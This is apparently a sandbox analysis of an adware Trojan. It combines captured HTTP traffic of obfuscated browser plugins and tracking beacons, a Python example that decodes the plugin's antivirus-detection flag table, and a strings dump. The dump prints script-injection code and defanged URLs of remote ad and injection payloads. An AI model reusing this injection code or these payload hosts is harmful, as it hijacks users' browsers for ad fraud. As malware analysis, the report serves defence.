x74\x65\x64":32768,"\x79\x6F\x6E\x74\x6F\x6F\x5F\x64\x65\x74\x65\x63\x74\x65\x64":65536,"\x61\x76\x67\x5F\x73\x61\x66\x65\x67\x75\x61\x72\x64\x5F\x64\x65\x74\x65\x63\x74\x65\x64":131072,"\x67\x65\x65\x6B\x5F\x62\x75\
<<< skipped >>>
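The 220.js plugin (`ICMBaseManager`) opens with a table of `*_detected` flags whose values are powers of two, so a set of detections can be packed into one integer; the keys are hidden with `\xNN` escapes, which is why the table reads as hex in the capture. The Python below is an added example, not code from the page, and works on the captured head of that table (un-escaped and closed with `}` because the capture stops at `"geek_bu`). Whether the middle field of `asw=0_1073750528_0` in the monetization beacon later on this page is this bitmask is an assumption the example makes to show the decode; the page does not state it, although `asw` and `__CROSSRIDER_ASW__` do appear in the setup plugin's string table.

```python
import json
import re

# Head of the flag table from the 220.js response on this page, keys still
# \xNN-escaped, cut after the last complete entry; the closing brace is added
# because the capture is truncated there.
ESCAPED_TABLE_220 = (
    r'{"\x61\x76\x67\x5F\x64\x65\x74\x65\x63\x74\x65\x64":1,'
    r'"\x61\x76\x61\x73\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64":2,'
    r'"\x61\x76\x69\x72\x61\x5F\x64\x65\x74\x65\x63\x74\x65\x64":4,'
    r'"\x6D\x73\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64":8,'
    r'"\x65\x73\x65\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64":16,'
    r'"\x69\x6D\x61\x73\x68\x5F\x64\x65\x74\x65\x63\x74\x65\x64":32,'
    r'"\x76\x69\x70\x65\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64":64,'
    r'"\x61\x73\x6B\x74\x6F\x6F\x6C\x62\x61\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64":128,'
    r'"\x64\x65\x61\x6C\x70\x6C\x79\x5F\x64\x65\x74\x65\x63\x74\x65\x64":256,'
    r'"\x66\x75\x6E\x6D\x6F\x6F\x64\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64":512,'
    r'"\x6D\x63\x61\x66\x65\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64":1024,'
    r'"\x6D\x61\x6C\x77\x61\x72\x65\x62\x79\x74\x65\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64":2048,'
    r'"\x62\x61\x69\x64\x75\x61\x76\x5F\x64\x65\x74\x65\x63\x74\x65\x64":4096,'
    r'"\x73\x70\x61\x72\x6B\x5F\x62\x61\x69\x64\x75\x5F\x64\x65\x74\x65\x63\x74\x65\x64":8192,'
    r'"\x62\x32\x63\x5F\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x5F\x64\x65\x74\x65\x63\x74\x65\x64":16384,'
    r'"\x63\x72\x6F\x73\x73\x72\x69\x64\x65\x72\x5F\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x5F\x64\x65\x74\x65\x63\x74\x65\x64":32768,'
    r'"\x79\x6F\x6E\x74\x6F\x6F\x5F\x64\x65\x74\x65\x63\x74\x65\x64":65536,'
    r'"\x61\x76\x67\x5F\x73\x61\x66\x65\x67\x75\x61\x72\x64\x5F\x64\x65\x74\x65\x63\x74\x65\x64":131072}'
)

HEX_ESCAPE_RE = re.compile(r'\\x([0-9A-Fa-f]{2})')


def unescape_js_hex(text):
    """Replace JavaScript \\xNN escapes with the characters they encode."""
    return HEX_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), text)


def load_flag_table(escaped_literal):
    """Un-escape the object literal, parse it, and check that every value is a
    single bit; returns {flag_name: bit_value}."""
    table = json.loads(unescape_js_hex(escaped_literal))
    for name, value in table.items():
        if value <= 0 or value & (value - 1):
            raise ValueError(f"{name}={value} is not a single bit")
    return table


def flags_set(value, table):
    """Expand a packed integer into the flag names it contains. Bits the
    captured table does not cover (the capture is truncated) are reported as
    'bit<N>' so nothing is silently dropped."""
    by_bit = {v: k for k, v in table.items()}
    names, bit = [], 0
    while value >> bit:
        if value & (1 << bit):
            names.append(by_bit.get(1 << bit, f"bit{bit}"))
        bit += 1
    return names


if __name__ == "__main__":
    # Assumed: the middle field of asw=0_1073750528_0 from the beacon on this page.
    print(flags_set(1073750528, load_flag_table(ESCAPED_TABLE_220)))
```

Under that assumption the sandbox's value expands to `funmoods_detected`, `spark_baidu_detected` and an unnamed bit 30 that lies beyond the captured part of the table; the unknown bit is exactly the kind of thing the reporter should print rather than discard.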
GET /plugins/mins/180.js?ver=20&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1450608507"
Last-Modified: Sun, 20 Dec 2015 10:48:27 GMT
Cache-Control: max-age=125
Content-Length: 1407
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop015.fr7.t,1456422148.cds027.fr7.c
if (typeof setup2 === 'function') { setup2('MTY2MDcxNDQwMTBlMTkwMjM3MTQwMTQ4NDI0NjRiMTIxOTA2MTI1YzQyNDUxOTQ4MWExNDAyMDUxMjBhMGMwNDFkMTU0NzE5MDIxZjRkMDc0MzFhMTAxNjU2NGM1ZjQ0MTAwMzBiNTg0NTM5MzYzOTNmM2QzMTM1M2YyMzNjMjMzYjI1MjgyYTM2MjMyMzJlM2QyMjM2MjkzODMwM2QyZjI5MzUyNzQwNWY0ODViM2MwMzBiMDg1NzI3MzkyYTI4MjIyMTMxMzQyNDJlM2QzNDM2M2IzZDIyM2QyODJjMjczZDM5MzY1YzViNDA1NDE0MDgwYzRiNWIzNjI1MmUyMDJkMzUzZTM4MzEyMjJjMjgzMjI3MzEyMzNmMzUzMTIyMzYyNTRiNDQ1MDUwMWYwZjFlNTc1NDRjNWU0NTUwNTAwYjVkNGI1MTVhNGQ1ZjQ0NWI1MDU5NWM0ZDUxNWI1YzE5MTcwYjAyNTAzNTI3MjUzYjM1M2UyMTMwMmYyOTJmMmEzOTI4MmEzZDJkMmIyMjMyMzU1ZTEyMWMxMzA5NGYzZDM5MmUzODM3MzUzYTI4MjQzNjI3MzQzMjIzMzYzNTNkM2IyMTNlMjczNDMyM2YyYjIzM2IyNTI0MzYzZDM5NGY0NjcyNmY0YjEyMTkwNjEyMTUzODE4MTQ0NDUzNWE0ZjFhMTYxMjFkMTk0MjQ5NDYxYjQzMDEwYzA5MWExYTE0MDcwNzFmMWU1YzAxMDkwMDQ1MTk0ODE5MTIxZDRkNTQ1NDViMTgxZDAwNWI0NzMyMmQyMTM0MjIzOTJiMzQyMDNlMjgyMDNkMjMzNTNlM2QyODJkM2YyOTJkMzEzMzJmMzUzMTIyMzYyNTRiNDQ1MDUwMjMwYjE1MDM1NDI1MzIzMTMwMjkzZTM5MmEyZjJkM2YzZjJkMjMzNjNkMzUzNjI3MjQzZjMyMmQ0NDUwNWY1YzBhMDMwZjQ5NTAyZDNkMjUzZjI1MmIzNTNiMzMyOTM3MzAzOTM4MzkzZDM0MzYzMzI5MmQzZDQwNWI1ODRlMTQwYzFjNWM0ZjU0NTU1YTU4NGUwMDVlNDk1YTQxNTU1NDViNTM0ZTUyNWY0ZjVhNDA0NDEyMDgwMzFjNWIzNjI1MmUyMDJkMzUzZTM4MzEyMjJjMjgzMjMzMzIzNjMyMjMzYzM5MzY1YzE5MDcwYjAyNTAzNTI3MjUzYjM1M2UyMTMwMmYyOTJmMmEzOTIwMzQzZTI2MjMyYTIxMmYyYTM5M2MyOTI4MjAzZDJmMjkzNTI3NDQ0NTcwNjQ1MDEyMGExODBkMTEwODIwMWU0ZjQ4NDI1NzU1NWE3MjFi', 'mjxfizmrbf'); }....
<<< skipped >>>
GET /plugins/mins/91.js?ver=186&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1451210071"
Last-Modified: Sun, 27 Dec 2015 09:54:31 GMT
Cache-Control: max-age=441
Content-Length: 188421
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop015.fr7.t,1456422148.cds012.fr7.c
(function(M){window.__loaderIsRunning__=false;var A=[].slice;var z={};var a=function(at){if(typeof at=="string"&&typeof at.trim=="function"){return at.trim();}return at==null?"":at.toString().replace(/^\s /,"").replace(/\s $/,"");};function f(at){var au=z[at]={},av,aw;at=at.split(/\s /);for(av=0,aw=at.length;av<aw;av ){au[at[av]]=true;}return au;}var H=function(at,au){var aw=[];for(var av=0;av<at.length;av ){if(av in at){var ax=au(at[av],av,at);if(ax!=null){aw.push(ax);}}}return aw;};var ad=function(aw,az,av){var au,ax=0,ay=aw.length,at=ay===undefined||appAPI.utils.isFunction(aw);if(av){if(at){for(au in aw){if(az.apply(aw[au],av)===false){break;}}}else{for(;ax<ay;){if(az.apply(aw[ax ],av)===false){break;}}}}else{if(at){for(au in aw){if(az.call(aw[au],au,aw[au])===false){break;}}}else{for(;ax<ay;){if(az.call(aw[ax],ax,aw[ax ])===false){break;}}}}return aw;};var J=function(av){av=av?(z[av]||f(av)):{};var aA=[],aB=[],aw,ax,au,ay,az,aD=function(aE){var aF,aI,aH,aG,aJ;for(aF=0,aI=aE.length;aF<aI;aF ){aH=aE[aF];aG=appAPI.utils.isArray(aH)?"array":(appAPI.utils.isFunction(aH)?"function":"");if(aG==="array"){aD(aH);}else{if(aG==="function"){if(!av.unique||!aC.has(aH)){aA.push(aH);}}}}},at=function(aF,aE){aE=aE||[];aw=!av.memory||[aF,aE];ax=true;az=au||0;au=0;ay=aA.length;for(;aA&&az<ay;az ){if(aA[az].apply(aF,aE)===false&&av.stopOnFalse){aw=true;break;}}ax=false;if(aA){if(!av.once){if(aB&&aB.length){aw=aB.shift();aC.fireWith(aw[0],aw[1]);}}else{if(aw===true){aC.disable();}else{aA=[];}}}},aC={add
<<< skipped >>>
GET /plugins/mins/253.js?ver=2&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:29 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1417718237"
Last-Modified: Thu, 04 Dec 2014 18:37:17 GMT
Cache-Control: max-age=900
Content-Length: 735
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422149.dop015.fr7.t,1456422149.cds049.fr7.c
if (typeof setup2 === 'function') { setup2('<<< skipped >>>', 'ujvjmfakaj'); }..
GET /monetization.gif?event=3&ibic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201&app=64755&bhover=1_35_09_29&xpiver=0_95&crxver=1_26_43&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1456422014&asw=0_1073750528_0&browser=ie,de,te,tc&rnd=1456422014 HTTP/1.1
Host: logs.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:15 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1456422135.dop003.fr7.t,1456422135.cds050.fr7.c
GIF89a.............,...........D..;..
GET /ThawteTimestampingCA.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.thawte.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "ed105ad04f9762dff775f597758fe83a:1450503189"
Last-Modified: Sat, 19 Dec 2015 05:15:01 GMT
Date: Thu, 25 Feb 2016 17:42:19 GMT
Content-Length: 341
Connection: keep-alive
Content-Type: application/pkix-crl
0..Q0..0...*.H........0..1.0...U....ZA1.0...U....Western Cape1.0...U....Durbanville1.0...U....Thawte1.0...U....Thawte Certification1.0...U....Thawte Timestamping CA..151217000000Z..160331235959Z0...*.H..............X...;J..b. ..>..P.T....u.^q;C..*8.....*!3......tZ<.Z......-....T...........>E2.....'s.ij.GL.........h.NNb.8.G..$.. u.7.....22...
GET /tss-ca-g2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: ts-crl.ws.symantec.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "564b9f6a1d7f5e7549d605d810a7bf38:1456392807"
Last-Modified: Thu, 25 Feb 2016 09:01:25 GMT
Date: Thu, 25 Feb 2016 17:42:19 GMT
Content-Length: 477
Connection: keep-alive
Content-Type: application/pkix-crl
0...0.....0...*.H........0^1.0...U....US1.0...U....Symantec Corporation100...U...'Symantec Time Stamping Services CA - G2..160225090125Z..160306090125Z.00.0...U.#..0..._..n\..t...}.?..L...0...U........0...*.H.................A...X..1[...=/.G.j..1....,..8k...n.9.....@!....w.:..-....I.o.2.J...R.O".G....#...J..d7(.TZ.V._......H{.i...a..R&...6.@...ERM.w...a..N...O..g..6...)...r..z......o<...q...D....T.|.....?Ju....M..)S.............N...*....kh...<.\>7...:(!z.#....W...2..A.^.C...
GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/plain
Last-Modified: Thu, 28 Jan 2016 17:51:53 GMT
Accept-Ranges: bytes
ETag: "80823092f459d11:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Date: Thu, 25 Feb 2016 17:42:19 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
1401D159F4929680B9....
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: application/octet-stream
Last-Modified: Thu, 28 Jan 2016 18:43:43 GMT
Accept-Ranges: bytes
ETag: "80d9e4cffb59d11:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 49661
Date: Thu, 25 Feb 2016 17:42:19 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
MSCF............,...................I.......d.........<H.T .authroot.stl. ..-.8..CK...<Tk........./.........Z..e..P..D.&.BRTH...E..E.b.["$qS)....-...[..}.o~g...q...Y...n...........aF\!.lI.4..0..ef.W.....C`....Y..F.D5...Y.A....1.|..c.1...Nc.Y..x..D...NP[FX...O.s@.aN.....'.B......."(~3z-.@~..|}(.......g4.p.........h.n.dQz..t.V.......;.....Q...d/../.pJ...6....E...A.@..]..T9..28..,..p...).....P:}.K...]=.7X.f..9..yB.P....uP$$...Q.u..y..".=......7...........#.X..P.8....>U....v.[.$.e...H.@~..........ea`.3...tLX...].-....<.........v.....M../..z6.t^.....p....M...v(CP%F.......!eX..a...-..G.....S%..l.....Y..(.*.-....C.L0...G.....).rm8...(7.T{.Q...."...B`H.....3..9..-..Vv.5Q.e.W.../...RY.v.P. .........l......8'.&z......3.;:...U4.."....yu... .."....d .e/7.;.XD*tn%$.........];..fY.R...7.....o.=xh...]..4...\.:...v....t..9 .nO.i}.T../(uke..p.&.6.E#.=b...@.R.P...*.s....h......(/.s.%.3g...:*X.].7.IE....E,.w.8......v...r4.qOh}~..E.5t...l...(*..2....`..F..".a:.t....9...W.kO?5..=..HhYrI.Sf..[:...3..2..)DB...;......(...B.......U(...._F./#.k@....9c.Y..G'..]...p..;M_o..~.3?.}.1M.5.f5)._......t _.6...l..K....OsY.0......H...^..\$P;U....8..)...1........J...uE..#n.......h.......17.P=,P.....}z.&..../..a.........p@.|KB..o.E..|..o.mr......m=.(v.:.i....@..I..w>4y....P........F...&... ....r$d..{B...)..A.`..x4E'~`V.."..(..(./G...@_Q`.....O...~`..~...x..KN~....Dko/A{..!...W..G,`)...*...#......q`..H.........%m..G....5..4.....?.......F...{.%..2....l.L....."...Y........ ...].\........... D..Y...!1..*.....M?..G..A.|Ex......~...s.!.=..
<<< skipped >>>
GET /monetization.gif?rand=15720&event=7&agent_type=2&ibic=8D4C23D6A4134239976F389726A57621IE&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201 HTTP/1.1
User-Agent: Google Update/1.3.25.0;winhttp
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
Host: logs.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:23 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1456422143.dop003.fr7.t,1456422143.cds050.fr7.c
GET /UTN-USERFirst-Object.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.usertrust.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 25 Feb 2016 17:42:22 GMT
Content-Type: application/x-pkcs7-crl
Content-Length: 75577
Last-Modified: Wed, 24 Feb 2016 21:00:01 GMT
Connection: close
ETag: "56ce19d1-12739"
X-CCACDN-Mirror-ID: h6edcacrl7
Cache-Control: max-age=3600
Accept-Ranges: bytes
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe_3000:
.text
`.rdata
@.data
.rsrc
tCPjB
8%u(j
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
1.2.1
Invalid HTTP(S) status code
InternetCrackUrlW
urlRedirected
HttpQueryInfoW
this module doesn't support file request
InternetCrackUrl Failed
port
HttpOpenRequest Failed
HttpSendRequest Failed with:
HttpQueryInfo Failed
HttpQueryInfoA
requestUrl
redirectUrl
httpCode
%d %d
Mozilla\Mozilla Firefox
9%D,3
1.1.1.2
inflate 1.2.7 Copyright 1995-2012 Mark Adler
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
VERSION.dll
HttpOpenRequestW
HttpSendRequestW
WININET.dll
GetProcessHeap
PeekNamedPipe
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegEnumKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
ADVAPI32.dll
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
UrlEscapeW
SHLWAPI.dll
COMCTL32.dll
GetCPInfo
.?AVCAgentExe@@
zcÃ
{A#ND$chromever=
Advapi32.dll
Chrome-Profiles
Firefox\Profiles
ie-error.gif
Wininet.dll
hXXps://
kernel32.dll
iexplore.exe
%d.%d.%d.%d
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe
Google\Chrome\Application\chrome.exe
Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
Software\Mozilla\Mozilla Firefox
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
Mozilla Firefox\firefox.exe
%d.%d (%d)
SOFTWARE\Microsoft\Windows NT\CurrentVersion
\0x%x
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
@crtorpedoie
if (document && document.location && typeof document.location.host == 'string' && document.location.host.indexOf('facebook.com') >= 0 && 194 !== PLUGIN_ID_PLACEHOLDER){
var tag = (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]);
K.setAttribute('src', httpUrl);
K.setAttribute('src', httpsUrl);
if (!httpsUrl || httpsUrl.length === 0) {
if ((typeof document.location.protocol === 'string') && (document.location.protocol.indexOf('https') === 0)) {
K.setAttribute('type', 'text/javascript');
var K = document.createElement('script');
var httpsUrl = '__HTTPS_URL_PLACEHOLDER__';
var httpUrl = '__HTTP_URL_PLACEHOLDER__';
tag.appendChild(K);
}, 500);
if (!document || !document.body || !tag){
if (!document || !document.body){
__HTTP_URL_PLACEHOLDER__
__HTTPS_URL_PLACEHOLDER__
hXXps://VVV.superfish.com/ws/sf_main.jsp?dlsource=hhvzmikw&userId=abc&CTID=__CROSSRIDER_EXTENDED_SUB_ID__&partnername=__CROSSRIDER_APP_NAME__
hXXp://VVV.superfish.com/ws/sf_main.jsp?dlsource=hhvzmikw&userId=abc&CTID=__CROSSRIDER_EXTENDED_SUB_ID__&partnername=__CROSSRIDER_APP_NAME__
hXXps://i_crdrjs_info.tlscdn.com/crdr/javascript.js?channel=crdr___CROSSRIDER_EXTENDED_SUB_ID__&appTitle=__CROSSRIDER_APP_NAME__&hid=__CROSSRIDER_USER_ID__
hXXp://i.crdrjs.info/crdr/javascript.js?channel=crdr___CROSSRIDER_EXTENDED_SUB_ID__&appTitle=__CROSSRIDER_APP_NAME__&hid=__CROSSRIDER_USER_ID__
hXXp://cdn.visadd.com/script/14567725765/preload.js?subid=__CROSSRIDER_SUB_ID__
hXXps://api.jollywallet.com/affiliate/client?dist=8&app_id=__CROSSRIDER_APP_ID__&s1=0&s2=0&s3=0&name=__CROSSRIDER_APP_NAME__
hXXp://api.jollywallet.com/affiliate/client?dist=8&app_id=__CROSSRIDER_APP_ID__&s1=0&s2=0&s3=0&name=__CROSSRIDER_APP_NAME__
hXXps://asrv-a.akamaihd.net/sd/1700/1043.js
hXXp://asrv-a.akamaihd.net/sd/1700/1043.js
hXXps://asrv-a.akamaihd.net/sd/1700/1037.js
hXXp://asrv-a.akamaihd.net/sd/1700/1037.js
hXXps://ads.tfxiq.com/a.php?626ref2=__CROSSRIDER_SUB_ID__&626Name=__CROSSRIDER_APP_NAME__&626ref3=__CROSSRIDER_USER_ID__&626ref1=63726f73737269646572&teid=__CROSSRIDER_APP_ID__&tuid=__CROSSRIDER_INSTALLER_USER_ID__
hXXp://ads.tfxiq.com/a.php?626ref2=__CROSSRIDER_SUB_ID__&626Name=__CROSSRIDER_APP_NAME__&626ref3=__CROSSRIDER_USER_ID__&626ref1=63726f73737269646572&teid=__CROSSRIDER_APP_ID__&tuid=__CROSSRIDER_INSTALLER_USER_ID__
hXXps://nps.noproblemppc.com/npsb/logic.js?OriginId=E8A4A23A-B034-E211-A9A0-001517D10F6E&SiteId=Sales&PartnerID=20000&ProductName=__CROSSRIDER_APP_NAME__&ToolbarId=__CROSSRIDER_EXTENDED_SUB_ID__
hXXp://nps.noproblemppc.com/npsb/logic.js?OriginId=E8A4A23A-B034-E211-A9A0-001517D10F6E&SiteId=Sales&PartnerID=20000&ProductName=__CROSSRIDER_APP_NAME__&ToolbarId=__CROSSRIDER_EXTENDED_SUB_ID__
hXXps://cdncache1-a.akamaihd.net/sub/v3219bd/__CROSSRIDER_SUB_ID__/l.js?pid=1094&ext=__CROSSRIDER_APP_NAME__&systemid=__CROSSRIDER_INSTALLER_USER_ID__
hXXp://cdncache1-a.akamaihd.net/sub/v3219bd/__CROSSRIDER_SUB_ID__/l.js?pid=1094&ext=__CROSSRIDER_APP_NAME__&systemid=__CROSSRIDER_INSTALLER_USER_ID__
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
mscoree.dll
USER32.DLL
%Program Files%\winservice86\0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe
winservice86 exe
1000.1000.1000.1000
winservice86.exe